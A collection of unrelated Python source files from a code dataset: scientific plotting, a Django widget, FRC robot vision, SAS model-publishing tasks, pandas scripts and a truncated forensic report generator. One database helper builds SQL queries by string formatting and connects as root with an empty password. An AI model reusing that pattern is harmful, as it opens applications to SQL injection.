len(times_to_catastrophe)\n delta_beta = beta_1 * (t_bar * beta_1 - 2) / (1 - t_bar * beta_1)\n tmp1 = n / (beta_1 + delta_beta)\n tmp2 = n / delta_beta\n tmp3 = np.sum(\n times_to_catastrophe * np.exp(-delta_beta * times_to_catastrophe) / (1 - np.exp(-delta_beta * times_to_catastrophe))\n )\n return tmp1 - tmp2 + tmp3\n\n# +\ndef plot_brentq_roots():\n \"\"\"\n plot the derivative of the log likelihood with respect to\n delta beta, as parametrized by beta_1, to see where\n the roots are. 
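# A small self-checking sketch (assumes numpy) of the model _draw_model
# samples from: the sum of two independent exponentials with rates b1 != b2
# is hypoexponential, with closed-form CDF
#   F(t) = 1 - (b2 * exp(-b1 * t) - b1 * exp(-b2 * t)) / (b2 - b1),
# so the ECDFs plotted above can be checked against it directly.
import numpy as np

def hypoexp_cdf(t, b1, b2):
    return 1.0 - (b2 * np.exp(-b1 * t) - b1 * np.exp(-b2 * t)) / (b2 - b1)

rg = np.random.default_rng(42)
b1, b2 = 0.005, 0.002
samples = rg.exponential(1 / b1, size=10000) + rg.exponential(1 / b2, size=10000)
t = np.median(samples)
empirical = (samples <= t).mean()  # ECDF evaluated at the sample median
assert abs(empirical - hypoexp_cdf(t, b1, b2)) < 0.02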
Plotted over values of beta_1 (0.003, 0.008)\n    \n    Inputs:\n        None\n    Outputs:\n        bokeh figure\n    \"\"\"\n    \n    df = tidy_data.tidy_dic()\n    \n    #Labelled data\n    labeled_data = df.loc[df['labeled'] == True, 'time to catastrophe (s)']\n\n    #convert to ndarray\n    times_to_catastrophe = labeled_data.to_numpy()\n\n    beta1_array = np.linspace(.003, .008, 1000)\n    dl = [_dl_ddb(beta1, times_to_catastrophe) for beta1 in beta1_array]\n    dl = np.array(dl)\n    \n    # Create the figure, stored in variable `p`\n    p = bokeh.plotting.figure(\n        width=400,\n        height=300,\n        x_axis_label=\"various values of beta1\",\n        y_axis_label=\"log likelihood dl/delta_beta\",\n        title = 'roots where beta1 maximizes mle',\n    )\n    p.line(\n        beta1_array,\n        dl,\n    )\n    return p\n\n#uncomment to run\n# p = plot_brentq_roots()\n# bokeh.io.show(p)\n\n# +\ndef main():\n#     # uncomment to use code\n#     df = _create_df_for_dashboard()\n\n#     beta1_slider = pn.widgets.DiscreteSlider(\n#         name='beta1',\n#         options=list(df[\"beta1\"].unique()),\n#         value = 1.0\n#     )\n\n#     beta2_slider = pn.widgets.DiscreteSlider(\n#         name='beta2',\n#         options=list(df[\"beta2\"].unique()),\n#         value = 1.0\n#     )\n#     # to use, uncomment this code\n#     widgets = pn.Column(pn.Spacer(height=30), beta1_slider, beta2_slider, width=200)\n#     pn.Row(plot_ecdf_pn, widgets)\n    \n    p2 = plot_beta_ratios_ecdf()\n    bokeh.io.show(p2)\n    \n    bokeh.io.save(\n        p2,\n        filename=\"viz_explore_two_arrival_story_Fig2a.html\",\n        title=\"Exploring two arrival story\",\n    )\n    \n    p3 = plot_brentq_roots()\n    bokeh.io.show(p3)\n    \n    bokeh.io.save(\n        p3,\n        filename=\"viz_explore_two_arrival_story_Fig2b.html\",\n        title=\"Exploring two arrival story\",\n    )\n    \n    plots = [p2, p3]\n    bokeh.io.save(\n        plots,\n        filename=\"viz_explore_two_arrival_story_Fig2.html\",\n        title=\"Exploring two arrival story\",\n    )\n    \n    \n    return True\n\nif __name__ == '__main__' : main()\n\n# +\n#!jupytext --to python viz_explore_two_arrival_story.ipynb\n# -\n\n\n","sub_path":"microtubulepkg/microtubulepkg/viz_explore_two_arrival_story.py","file_name":"viz_explore_two_arrival_story.py","file_ext":"py","file_size_in_byte":7307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"581282139","text":"#!/usr/bin/python3.7\n# -*- coding: utf-8 -*-\n# @Time : 2019/4/22 11:41\n# @Author: Jtyoui@qq.com\nimport zipfile\nfrom os import path\n\nfile_zip_path = path.dirname(path.abspath(__file__))\nsep = path.sep\n\n\ndef load_zip(zip_name, file_name, encoding='UTF-8', sep='\\n'):\n    \"\"\"加载zip数据\n\n    :param zip_name: 压缩包的名字\n    :param file_name: 压缩包里面文件的名字\n    :param encoding: 文件的编码\n    :param sep: 压缩文件里面的换行符\n    :return: 压缩包里面的数据:默认编码的UTF-8\n    \"\"\"\n    file_zip = path.join(file_zip_path, zip_name)\n    f = zipfile.ZipFile(file_zip)\n    fp = f.read(file_name)\n    lines = fp.decode(encoding).split(sep)\n    return lines\n\n\nif __name__ == '__main__':\n    line = load_zip('train.zip', 'train.txt')\n    for l in line:\n        print(l)\n\n# 关于文件压缩包目录\n# py.zip是汉语拼音\n# train.zip是中国火车站名字压缩包\n# city.zip是中国天气预报城市与编码\n","sub_path":"jtyoui/file_zip/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"25747186","text":"'''\nGiven a string of words ( known as Sentence ), reverse all the words.\n\nExample\nreverse('name is vishal kumar')\nReturns: 'kumar vishal is name'\n'''\n\n#using sorting\ndef reverse(sentence):\n\t''' \n\tFunction to reverse all the words in given sentence\n\tSyntax: 
reverse(sentence)\n\tTime Complexity: O(nlogn) \t\n\t'''\n\t#1st splitting the sentence into word list i.e. ['name', 'is', 'vishal', 'kumar']\n\t#then sort the word list in reverse order i.e. ['kumar', 'vishal', 'is', 'name']\n\t#joining the reversed list back into string\n\treturn ' '.join(sentence.split()[::-1]) \n\n\n#using Parsing\ndef reverse(sentence):\t\t\n\t''' \n\tFunction to reverse all the words in given sentence\n\tSyntax: reverse(sentence)\n\tTime Complexity: O(n) \t\n\t'''\n\ti=len(sentence)-1\n\treverse_word_list=[] #contains the reversed sentence\n\tword_length=0\n\tword=''\n\t\n\t#parsing the string from the end\n\twhile i >=0 :\n\n\t\tif sentence[i]==' ':\n\t\t\t#if space is encountered and word_length is not zero\n\t\t\t#means a new word is formed \n\t\t\tif word_length!=0:\n\t\t\t\treverse_word_list.append(word)\n\t\t\t\tword=''\n\t\t\t\tword_length=0\t\t\n\t\telse:\n\t\t\t#if i is some regular letter in the word of the sentence\n\t\t\t#then concatenate the letter with current word\n\t\t\tword=sentence[i]+word\n\t\t\tword_length+=1 #increment the word_length\n\t\t\n\t\ti-=1\t#decrement the loop-counter\n\n\t#for accommodation of the 1st word of the sentence\t\n\tif word_length!=0:\n\t\treverse_word_list.append(word)\t\n\n\treturn ' '.join(reverse_word_list) #joining the reversed word list back into string\n\n\n\n\t\t\nsentence='name is vishal kumar'\noutput=reverse(sentence)\nprint(output)","sub_path":"Arrays & Strings/Sentence Reversal.py","file_name":"Sentence Reversal.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"169301357","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom models import Widget\nfrom grouping import create_group, add2group\nfrom tinymce import models as tinymce_model\n\n#\n# Text\n#\n\ncreate_group('text', 'Текст')\n\n@add2group('Параграф', 'text')\nclass SimpleText(Widget):\n\n    TEXT_TYPE_CHOICES = (\n        (1, 'Анонс'),\n        (2, 'Цитата'),\n        (3, 'Заметки'),\n    )\n\n    text = models.TextField(\"Текст\", default=\"Text\")\n    text_type = models.PositiveIntegerField(\"Тип текстового блока\", choices=TEXT_TYPE_CHOICES, default=1)\n\n@add2group('Таблица характеристик', 'text')\nclass CharsTable(Widget): \n    text = models.TextField(\"Текст\", default=\"Свойство 1 :: Значение 1\\nСвойство 2 :: Значение 2\\nСвойство 3 :: Значение 3\")\n\n    def get_pairs(self):\n        result = []\n        lines = self.text.split(\"\\n\")\n        for line in lines:\n            try:\n                kv = line.split(\"::\")\n                result.append({ 'key': kv[0].strip(), 'value': kv[1].strip() })\n            except:\n                pass\n        return result\n","sub_path":"pim/trunk/widgets/set_text.py","file_name":"set_text.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"21764950","text":"import cv2\nimport numpy as np\nimport time\nfrom networktables import NetworkTables as nt\n\n\nframeScalingFactor = 0.3\n\n# PARAMS\nLBOUND_ORANGE = np.array([0, 100, 200])\nUBOUND_ORANGE = np.array([50, 255, 255])\n\nLBOUND_BRIGHT = np.array([0, 0, 250])\nUBOUND_BRIGHT = np.array([60, 100, 255])\n\nLBOUND_WHITE_BGR = np.array([254, 254, 254])\nUBOUND_WHITE_BGR = np.array([255, 255, 255])\n# END PARAMS\n\nprint(\"OpenCV version: \" + cv2.__version__)\n\ndef kernel(bgr):\n    bgr = cv2.blur(bgr, (7, 7))\n    hsv = cv2.cvtColor(bgr, cv2.COLOR_BGR2HSV)\n\n    mask_white = cv2.inRange(bgr, LBOUND_WHITE_BGR,UBOUND_WHITE_BGR)\n    mask_bright = cv2.inRange(hsv, LBOUND_BRIGHT, 
UBOUND_BRIGHT)\n    mask_orange = cv2.inRange(hsv, LBOUND_ORANGE, UBOUND_ORANGE)\n    mask = cv2.bitwise_or(mask_orange, mask_bright)\n    mask = cv2.bitwise_and(cv2.bitwise_not(mask_white),mask)\n    mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, (31, 31), iterations=2)\n\n    return mask\n\ncap = cv2.VideoCapture(1)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, cap.get(cv2.CAP_PROP_FRAME_WIDTH) * frameScalingFactor)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, cap.get(cv2.CAP_PROP_FRAME_HEIGHT) * frameScalingFactor)\n\nnt.initialize(server=\"roborio-6731-frc.local\")\nsd = nt.getTable(\"SmartDashboard\")\n\nwhile 1:\n    ### MAIN LOOP\n\n    r, bgr = cap.read()\n    h = bgr.shape[0]\n    hw = bgr.shape[1] * 0.5\n    \n    if r:\n        start = time.time()\n\n        mask = kernel(bgr)\n\n        end = time.time()\n\n        ### END MAIN LOOP\n\n        cv2.imshow(\"masked\", mask)\n\n        try:\n            M = cv2.moments(mask)\n            x = (M[\"m10\"] / M[\"m00\"] - hw) / hw\n            y = (M[\"m01\"] / M[\"m00\"]) / h\n            \n            print(\"x: \" + str(x) + \" y: \" + str(y))\n            sd.putNumber(\"ball_x|PI_2\", x)\n            sd.putNumber(\"ball_y|PI_2\", y)\n        except:\n            sd.putNumber(\"ball_x|PI_2\", -2)\n            sd.putNumber(\"ball_y|PI_2\", -2)\n\n\n    \n    bound1 = LBOUND_ORANGE\n    bound2 = UBOUND_ORANGE\n\n    c = cv2.waitKey(1) & 0xFF\n\n    keys1 = [ord(ki) for ki in \"rftgyh\"]\n    keys2 = [ord(ki) for ki in \"ujikol\"]\n    for k1 in range(len(keys1)):\n        if c == keys1[k1]:\n            direction = 1 if (k1 % 2)==0 else -1\n            which = k1 // 2\n            bound1[which] += direction\n    for k2 in range(len(keys2)):\n        if c == keys2[k2]:\n            direction = 1 if (k2 % 2)==0 else -1\n            which = k2 // 2\n            bound2[which] += direction\n\n    if c == ord('q'):\n        break\n\n    #print(str(bound1) +' '+ str(bound2))\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"340181869","text":"#!/usr/bin/env python\n# encoding: utf-8\n#\n# Copyright © 2019, SAS Institute Inc., Cary, NC, USA. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"Commonly used tasks in the analytics life cycle.\"\"\"\n\nimport json\nimport logging\nimport pickle\nimport re\nimport sys\nimport warnings\n\nfrom . 
import utils\nfrom .core import RestObj, get, get_link, request_link\nfrom .services import model_management as mm\nfrom .services import model_publish as mp\nfrom .services import model_repository as mr\nfrom .utils.pymas import PyMAS, from_pickle\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _sklearn_to_dict(model):\n # As of Viya 3.4 model registration fails if character fields are longer\n # than 1024 characters\n DESC_MAXLEN = 1024\n\n # As of Viya 3.4 model registration fails if user-defined properties are\n # longer than 512 characters.\n PROP_MAXLEN = 512\n\n # Convert Scikit-learn values to built-in Model Manager values\n mappings = {'LogisticRegression': 'Logistic regression',\n 'LinearRegression': 'Linear regression',\n 'SVC': 'Support vector machine',\n 'GradientBoostingClassifier': 'Gradient boosting',\n 'XGBClassifier': 'Gradient boosting',\n 'XGBRegressor': 'Gradient boosting',\n 'RandomForestClassifier': 'Forest',\n 'DecisionTreeClassifier': 'Decision tree',\n 'DecisionTreeRegressor': 'Decision tree',\n 'classifier': 'Classification',\n 'regressor': 'Prediction'}\n\n if hasattr(model, '_final_estimator'):\n estimator = type(model._final_estimator)\n else:\n estimator = type(model)\n\n # Can tell if multi-class .multi_class\n result = dict(\n description=str(model)[:DESC_MAXLEN],\n algorithm=mappings.get(estimator.__name__, estimator.__name__),\n scoreCodeType='ds2MultiType',\n trainCodeType='Python',\n function=mappings.get(model._estimator_type, model._estimator_type),\n tool='Python %s.%s'\n % (sys.version_info.major, sys.version_info.minor),\n properties=[{'name': str(k)[:PROP_MAXLEN],\n 'value': str(v)[:PROP_MAXLEN]}\n for k, v in model.get_params().items()]\n )\n\n return result\n\n\ndef register_model(model, name, project, repository=None, input=None,\n version=None, files=None, force=False):\n \"\"\"Register a model in the model repository.\n\n Parameters\n ----------\n model : swat.CASTable or sklearn.BaseEstimator\n The model to register. If an instance of ``swat.CASTable`` the table\n is assumed to hold an ASTORE, which will be downloaded and used to\n construct the model to register. If a scikit-learn estimator, the\n model will be pickled and uploaded to the registry and score code will\n be generated for publishing the model to MAS.\n name : str\n Designated name for the model in the repository.\n project : str or dict\n The name or id of the project, or a dictionary representation of\n the project.\n repository : str or dict, optional\n The name or id of the repository, or a dictionary representation of\n the repository. If omitted, the default repository will be used.\n input : DataFrame, type, list of type, or dict of str: type, optional\n The expected type for each input value of the target function.\n Can be omitted if target function includes type hints. 
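# An illustrative, hedged sketch (assumes scikit-learn is installed) of the
# kind of metadata _sklearn_to_dict above collects from an estimator; the
# truncation limits mirror its DESC_MAXLEN / PROP_MAXLEN constants.
import sys
from sklearn.linear_model import LogisticRegression

model = LogisticRegression()
meta = {
    "description": str(model)[:1024],
    "function": model._estimator_type,  # 'classifier' for this estimator
    "tool": "Python %s.%s" % (sys.version_info.major, sys.version_info.minor),
    "properties": [{"name": str(k)[:512], "value": str(v)[:512]}
                   for k, v in model.get_params().items()],
}
assert meta["function"] == "classifier"
assert any(p["name"] == "penalty" for p in meta["properties"])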
If a DataFrame\n        is provided, the columns will be inspected to determine type information.\n        If a single type is provided, all columns will be assumed to be that type,\n        otherwise a list of column types or a dictionary of column_name: type\n        may be provided.\n    version : {'new', 'latest', int}, optional\n        Version number of the project in which the model should be created.\n        Defaults to 'new'.\n    files : list\n    force : bool, optional\n        Create dependencies such as projects and repositories if they do not\n        already exist.\n\n    Returns\n    -------\n    model : RestObj\n        The newly registered model as an instance of ``RestObj``\n\n    Notes\n    -----\n    If the specified model is a CAS table the model data and metadata will be\n    written to a temporary zip file and then imported using\n    model_repository.import_model_from_zip.\n\n    If the specified model is from the Scikit-Learn package, the model will be\n    created using model_repository.create_model and any additional files will\n    be uploaded as content.\n\n    \"\"\"\n    # TODO: Create new version if model already exists\n    # TODO: Allow file info to be specified\n    # TODO: Performance stats\n\n    # If version not specified, default to creating a new version\n    version = version or 'new'\n\n    # If replacing an existing version, make sure the model version exists\n    if str(version).lower() != 'new':\n        model_obj = mr.get_model(name)\n        if model_obj is None:\n            raise ValueError(\"Unable to update version '%s' of model '%s'. \"\n                             \"Model not found.\" % (version, name))\n        model_versions = request_link(model_obj, 'modelVersions')\n        assert isinstance(model_versions, list)\n\n        # Use 'new' to create a new version if one doesn't exist yet.\n        if len(model_versions) == 0:\n            raise ValueError(\"No existing version of model '%s' to update.\"\n                             % name)\n\n        # Helper function for extracting version number of REST response\n        def get_version(x):\n            return float(x.get('modelVersionName', 0))\n\n        if str(version).isnumeric():\n            match = [x for x in model_versions if float(version) ==\n                     get_version(x)]\n            assert len(match) <= 1\n\n            match = match[0] if len(match) else None\n        elif str(version).lower() == 'latest':\n            # Sort by version number and take the newest\n            match = sorted(model_versions, key=get_version)[-1]\n        else:\n            raise ValueError(\"Unrecognized version '%s'.\" % version)\n\n    #\n\n    # TODO: get ID of correct model version\n    # if version != new, get existing model\n    #    get model (modelVersions) rel\n    #    -> returns list w/ id, modelVersionName, etc\n\n    files = files or []\n\n    # Find the project if it already exists\n    p = mr.get_project(project) if project is not None else None\n\n    # Do we need to create the project first?\n    create_project = True if p is None and force else False\n\n    if p is None and not create_project:\n        raise ValueError(\"Project '{}' not found\".format(project))\n\n    # Use default repository if not specified\n    if repository is None:\n        repository = mr.default_repository()\n    else:\n        repository = mr.get_repository(repository)\n\n    # Unable to find or create the repo.\n    if repository is None:\n        raise ValueError(\"Unable to find repository '{}'\".format(repository))\n\n    # If model is a CASTable then assume it holds an ASTORE model.\n    # Import these via a ZIP file.\n    if 'swat.cas.table.CASTable' in str(type(model)):\n        zipfile = utils.create_package(model)\n\n        if create_project:\n            project = mr.create_project(project, repository)\n\n        model = mr.import_model_from_zip(name, project, zipfile,\n                                         version=version)\n        return model\n\n    # If the model is a scikit-learn model, generate the model dictionary\n    
# from it and pickle the model for storage\n elif all(hasattr(model, attr) for attr\n in ['_estimator_type', 'get_params']):\n # Pickle the model so we can store it\n model_pkl = pickle.dumps(model)\n files.append({'name': 'model.pkl',\n 'file': model_pkl,\n 'role': 'Python Pickle'})\n\n # Extract model properties\n model = _sklearn_to_dict(model)\n model['name'] = name\n\n # Generate PyMAS wrapper\n try:\n mas_module = from_pickle(model_pkl, 'predict',\n input_types=input, array_input=True)\n assert isinstance(mas_module, PyMAS)\n\n # Include score code files from ESP and MAS\n files.append({'name': 'dmcas_packagescorecode.sas',\n 'file': mas_module.score_code(),\n 'role': 'Score Code'})\n files.append({'name': 'dmcas_epscorecode.sas',\n 'file': mas_module.score_code(dest='CAS'),\n 'role': 'score'})\n\n model['inputVariables'] = [var.as_model_metadata()\n for var in mas_module.variables\n if not var.out]\n\n model['outputVariables'] = \\\n [var.as_model_metadata() for var in mas_module.variables\n if var.out and var.name not in ('rc', 'msg')]\n except ValueError:\n # PyMAS creation failed, most likely because input data wasn't\n # provided\n logger.exception('Unable to inspect model %s', model)\n\n warnings.warn('Unable to determine input/output variables. '\n ' Model variables will not be specified and some '\n 'model functionality may not be available.')\n else:\n # Otherwise, the model better be a dictionary of metadata\n assert isinstance(model, dict)\n\n if create_project:\n vars = model.get('inputVariables', [])[:]\n vars += model.get('outputVariables', [])\n\n if model.get('function') == 'Regression':\n target_level = 'Interval'\n else:\n target_level = None\n\n project = mr.create_project(project, repository,\n variables=vars,\n targetLevel=target_level)\n\n model = mr.create_model(model, project)\n\n assert isinstance(model, RestObj)\n\n # Upload any additional files\n for file in files:\n if isinstance(file, dict):\n mr.add_model_content(model, **file)\n else:\n mr.add_model_content(model, file)\n\n return model\n\n\ndef publish_model(model,\n destination,\n code=None,\n max_retries=60,\n replace=False, **kwargs):\n \"\"\"Publish a model to a configured publishing destination.\n\n Parameters\n ----------\n model : str or dict\n The name or id of the model, or a dictionary representation of\n the model.\n destination : str\n code : optional\n max_retries : int, optional\n replace : bool, optional\n Whether to overwrite the model if it already exists in\n the `destination`\n kwargs : optional\n additional arguments will be passed to the underlying publish\n functions.\n\n Returns\n -------\n RestObj\n The published model\n\n Notes\n -----\n If no code is specified, the model is assumed to be already registered in\n the model repository and Model Manager's publishing functionality will be\n used.\n\n Otherwise, the model publishing API will be used.\n\n See Also\n --------\n :meth:`model_management.publish_model <.ModelManagement.publish_model>`\n :meth:`model_publish.publish_model <.ModelPublish.publish_model>`\n\n\n .. 
versionchanged:: 1.1.0\n        Added `replace` option.\n\n    \"\"\"\n    def submit_request():\n        # Submit a publishing request\n        if code is None:\n            dest_obj = mp.get_destination(destination)\n\n            if dest_obj and dest_obj.destinationType == \"cas\":\n                publish_req = mm.publish_model(model, destination,\n                                               force=replace,\n                                               reload_model_table=True)\n            else:\n                publish_req = mm.publish_model(model, destination,\n                                               force=replace)\n        else:\n            publish_req = mp.publish_model(model, destination,\n                                           code=code, **kwargs)\n\n        # A successfully submitted request doesn't mean a successfully\n        # published model. Response for publish request includes link to\n        # check publish log\n        job = mr._monitor_job(publish_req, max_retries=max_retries)\n        return job\n\n    # Submit and wait for status\n    job = submit_request()\n\n    # If model was successfully published and it isn't a MAS module, we're done\n    if job.state.lower() == 'completed' \\\n            and job.destination.destinationType != 'microAnalyticService':\n        return request_link(job, 'self')\n\n    # If MAS publish failed and replace=True, attempt to delete the module\n    # and republish\n    if job.state.lower() == 'failed' and replace and \\\n            job.destination.destinationType == 'microAnalyticService':\n        from .services import microanalytic_score as mas\n        mas.delete_module(job.publishName)\n\n        # Resubmit the request\n        job = submit_request()\n\n    # Raise exception if still failing\n    if job.state.lower() == 'failed':\n        log = request_link(job, 'publishingLog')\n        raise RuntimeError(\"Failed to publish model '%s': %s\"\n                           % (model, log.log))\n\n    # Raise exception if unknown status received\n    elif job.state.lower() != 'completed':\n        raise RuntimeError(\"Model publishing job in an unknown state: '%s'\"\n                           % job.state.lower())\n\n    log = request_link(job, 'publishingLog')\n    msg = log.get('log').lstrip('SUCCESS===')\n\n    # As of Viya 3.4 MAS converts module names to lower case.\n    # Since we can't rely on the request module name being preserved, try to\n    # parse the URL out of the response so we can retrieve the created module.\n    try:\n        details = json.loads(msg)\n\n        module_url = get_link(details, 'module')\n        module_url = module_url.get('href')\n    except json.JSONDecodeError:\n        match = re.search(r'(?:rel=module, href=(.*?),)', msg)\n        module_url = match.group(1) if match else None\n\n    if module_url is None:\n        raise Exception('Unable to retrieve module URL from publish log.')\n\n    module = get(module_url)\n\n    if 'application/vnd.sas.microanalytic.module' in module._headers[\n            'content-type']:\n        # Bind Python methods to the module instance that will execute the\n        # corresponding MAS module step.\n        from sasctl.services import microanalytic_score as mas\n        return mas.define_steps(module)\n    return module\n","sub_path":"src/sasctl/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":14618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"222713431","text":"import pymysql\r\n\r\nclass MysqL:\r\n    conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='', db='fuwo6', charset='UTF8')\r\n    def select(self,name,conter):\r\n        cur = self.conn.cursor()\r\n        cur.execute(\"select id from weibo where NAME ='%s' and conter='%s'\"%(name,conter))\r\n        r = cur.fetchone()\r\n        cur.close()\r\n        return r\r\n\r\n    def insert(self,**kwargs):\r\n        sql = 'insert into weibo (name,time,conter,weight2,weight1,praise)' \\\r\n              'VALUE (\"%(name)s\",\"%(time)s\",\"%(conter)s\",%(weight2)s,%(weight1)s,%(praise)s)'%(kwargs)\r\n        try:\r\n            sl = 
self.select(kwargs['name'],kwargs['conter'])\r\n cur = self.conn.cursor()\r\n if type(None)!=type(sl):\r\n return False\r\n cur.execute(sql)\r\n self.conn.commit()\r\n return True\r\n except pymysql.Error as e:\r\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\r\n print(sql)\r\n cur.close\r\n return False\r\n\r\n def close(self):\r\n return self.conn.close\r\n\r\n# print (MysqL().insert(name='test',time='test',other='test',conter='test'))","sub_path":"Cdb.py","file_name":"Cdb.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"597747882","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[5]:\n\n\nimport pandas as pd\nimport os\nimport numpy\nimport MySQLdb\nimport omdtfn as odt\n\n#conn= MySQLdb.connect(\"localhost\",\"root\",\"admin\",\"omdb\")\n#df_mysql = pd.read_sql(\"select * from sitedb\",conn)\nomdb = os.getcwd() + \"\\\\\" + \"OMDB.csv\"\npntxt = os.getcwd() + \"\\\\\" + \"Periodic_Notification.txt\"\npth = os.getcwd() + \"\\\\\" + \"WRT1.csv\"\npth2 = os.getcwd() + \"\\\\\" + \"WRT2.csv\"\n\n#lambda : if ( if else )\nTS = lambda x : '2G' if ('2G SITE DOWN' in x) else ('3G' if ('3G SITE DOWN' in x) else ('4G' if ('4G SITE DOWN' in x) else ('MF' if ('MAIN' in x) else ('DC' if ('VOLTAGE' in x) else ('TM' if ('TEMPERATURE' in x) else ('SM' if ('SMOKE' in x) else ('GN' if ('GEN' in x) else ('GN' if ('GENSET' in x) else ('TH' if ('THEFT' in x) else ('2_CELL' if ('2G CELL DOWN' in x) else ('3_CELL' if ('3G CELL DOWN' in x) else ('4_CELL' if ('4G CELL DOWN' in x) else \"NA\"))))))))))))\n\ndef write2txt(flname,txt):\n fo = open(flname,\"w+\")\n txt = fo.write(txt)\n fo.close()\n\nclass omdf:\n def __init__(self,dic):\n self.df = pd.DataFrame(dic)\n self.arr = self.df.to_numpy()\n def df_addcol_lamda(self):\n self.df['cat'] = self.df.apply(lambda row: TS(row.Summary), axis = 1)\n return self.df.to_dict()\n def df_addcol_fdic(self,d,newcolname):\n self.df[newcolname] = self.df['scode'].map(d)\n return self.df.to_dict()\n def df_apply_on_col(self,newcolname):\n self.df[newcolname] = self.df.apply(lambda x : x.CustomAttr15[0:5], axis = 1)\n return self.df.to_dict()\n def df_remove_col_by_list(self,lis):\n ndf = self.df[lis]\n return ndf.to_dict()\n\n\ncols = [\"SERIAL\",\"EQUIPMENTKEY\",\"CUSTOMATTR15\",\"SUMMARY\",\"LASTOCCURRENCE\",\"CLEARTIMESTAMP\",\"ALARMDETAILS\",\"CUSTOMATTR15\"]\nsingle = os.getcwd() + \"\\\\\" + \"DWRRU.csv\"\ndf = pd.read_csv(single)\ndf2 = df[cols]\nprint(df2['CUSTOMATTR15'].value_counts())\nprint(df2)\n#df3 = df2.replace(np.nan,0)\n#print(df2)\n\n\n\n#codelist = [df['CUSTOMATTR15'].to_list()]\n#print(codelist)\n\n\n\n#Codelist = df2['CUSTOMATTR15']\n\n\n#df2['cnt'] = df2['CUSTOMATTR15'].value_counts()\n#print(df2)\n\n\n#df2['cnt'] = lambda x : x.df2['CUSTOMATTR15'].value_counts()\n#df['count'] = df['CUSTOMATTR15'].value_counts()\n#print(df)\n#print(df2)\n\n#print(fdf['CUSTOMATTR15'].value_counts())\n#df3 = df2.apply(lambda s: s['CUSTOMATTR15'], axis=1)\n#df4 = df['CUSTOMATTR15'].value_counts().loc[lambda x : ]\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Z_ALL_FILE/Jy1/fndf_rru.py","file_name":"fndf_rru.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"316959813","text":"__author__ = 'root'\n# -*- coding: utf-8 -*-\n\"\"\"from reportlab.pdfgen import canvas\nfrom reportlab.lib.units import inch, cm\nc = 
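The Cdb.py insert above interpolates values straight into the SQL string and never actually closes its cursor (cur.close without parentheses is a no-op). A hedged rewrite against the same assumed schema, using pymysql's parameter binding; the sample row values are invented.

import pymysql

conn = pymysql.connect(host='localhost', port=3306, user='root',
                       passwd='', db='fuwo6', charset='utf8')
try:
    with conn.cursor() as cur:  # cursor is closed when the block exits
        sql = ('insert into weibo (name, time, conter, weight2, weight1, praise) '
               'values (%s, %s, %s, %s, %s, %s)')
        cur.execute(sql, ('test', '2020-01-01', 'hello', 1, 2, 3))
    conn.commit()
except pymysql.Error as e:
    print('Error %d: %s' % (e.args[0], e.args[1]))
finally:
    conn.close()  # note the parentheses; conn.close alone does nothing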
canvas.Canvas('ex1.pdf')\n#self.report.drawImage('zaza.jpg', 0, 0, 10*cm, 10*cm)\nself.report.drawString(100, 300, \"Je suis zaza, the girl with the most beautiful natural duck face there is\")\nself.report.showPage()\nself.report.save()\n\"\"\"\n\n\nfrom xhtml2pdf import pisa # import python module\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\"\"\"\nself.report += 5,\"Hashé SHA256 du fichier : \")\nself.report += 4,\"Date de création du fichier : \")\nself.report += 3,\"Taille du fichier analysé : \")\n\"\"\"\n\n\n\nclass Preview(object):\n def __init__(self, filename, size, startDate, endDate, ESSID, BSSID, packetsNumber, channel, signal\n , nodesNumber, duration, uptime):\n\n self.filename = filename\n self.size = size\n self.startDate = startDate\n self.endDate = endDate\n self.ESSID = ESSID\n self.BSSID = BSSID\n self.packetsNumber = packetsNumber\n self.channel = channel\n self.signal = signal\n self.nodesNumber = nodesNumber\n self.duration = duration\n self.uptime =uptime\n\n\n\nclass Report(object):\n\n def __init__(self, detectiveName, investigationDate, attack, preview, nodes, path):\n self.filename = path+\"report_\"+preview.ESSID+\"_\"+investigationDate+\".pdf\"\n self.preview = preview\n self.detectiveName = detectiveName\n self.investigationDate = investigationDate\n self.attack = attack\n self.nodes = nodes\n with open(\"stats.csv\") as f:\n content = f.readlines()\n self.mgtPackets = [int(x) for x in content[1].split(',')]\n self.allPackets = [int(x) for x in content[0].split(',')]\n del self.mgtPackets[6]\n del self.mgtPackets[6]\n\n\n\n self.report = \"\"\"\"\n\n\n\n\n\n\n\n\n \n \"\"\"\n imagePath = os.path.abspath(\"Parser/Parsed/file\"+self.preview.ESSID+\".png\")\n self.report += \"

Nom de l'investigateur : {0}
\".format(self.detectiveName)\n self.report += \"Date de l'investigation : {0}
\".format(self.investigationDate)\n self.report += \"Nom du fichier analysé : {0}
\".format(self.preview.filename)\n self.report += \"ESSID du réseau analysé : {0}
